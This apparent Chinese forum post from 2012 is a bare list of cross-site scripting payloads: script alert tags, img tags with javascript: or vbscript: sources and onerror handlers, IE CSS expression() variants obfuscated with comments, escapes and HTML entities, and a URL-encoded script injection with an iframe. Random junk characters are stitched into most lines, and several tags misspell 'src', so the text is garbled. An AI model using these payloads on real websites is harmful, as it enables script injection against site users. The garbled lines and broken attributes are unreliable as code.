<script>alert("跨站")</script> (最常用)/ R8 }" `/ F* `0 ] H8 u! B
<img scr=javascript:alert("跨站")></img>: H' C1 O, `4 P# ^) m" N) T
<img scr="javascript: alert(/跨站/)></img>
; R# e2 v! I+ F8 C# b. M4 N<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)4 ^- b( u# F0 I( j% h6 V) N
<img scr="#" onerror=alert(/跨站/)></img>
7 d2 }0 x: r" T<img scr="#" style="xss:expression(alert(/xss/));"></img>
( o* ]! U6 {6 v2 u. }<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释). I* P; w3 L0 _7 y! _1 {
<img src=vbscript:msgbox ("xss")></img>) _0 N9 _. A0 D6 L6 P! W# q
<style> input {left:expression (alert('xss'))}</style>
! T9 q( B0 E9 E& [, o<div style={left:expression (alert('xss'))}></div>
9 N1 @' }) v9 E1 H! n5 ~, C( N<div style={left:exp/* */ression (alert('xss'))}></div>
( i- l$ e4 F; S2 M o* I9 l<div style={left:\0065\0078ression (alert('xss'))}></div>$ b, g; m3 l- T8 i1 D5 e
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
: t% T) K2 l* Q1 [ ?* }) l5 q6 n2 B. ]unicode <div style="{left:expRessioN (alert('xss'))}">
& P2 T" c( d/ }6 k! M- z2 R+ s, `1 y6 ?' o8 h
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["" i" d4 x" O9 X1 B8 C& S/ u- N1 Q
|
发表于 2012-9-15 14:09:13
收藏
支持
反对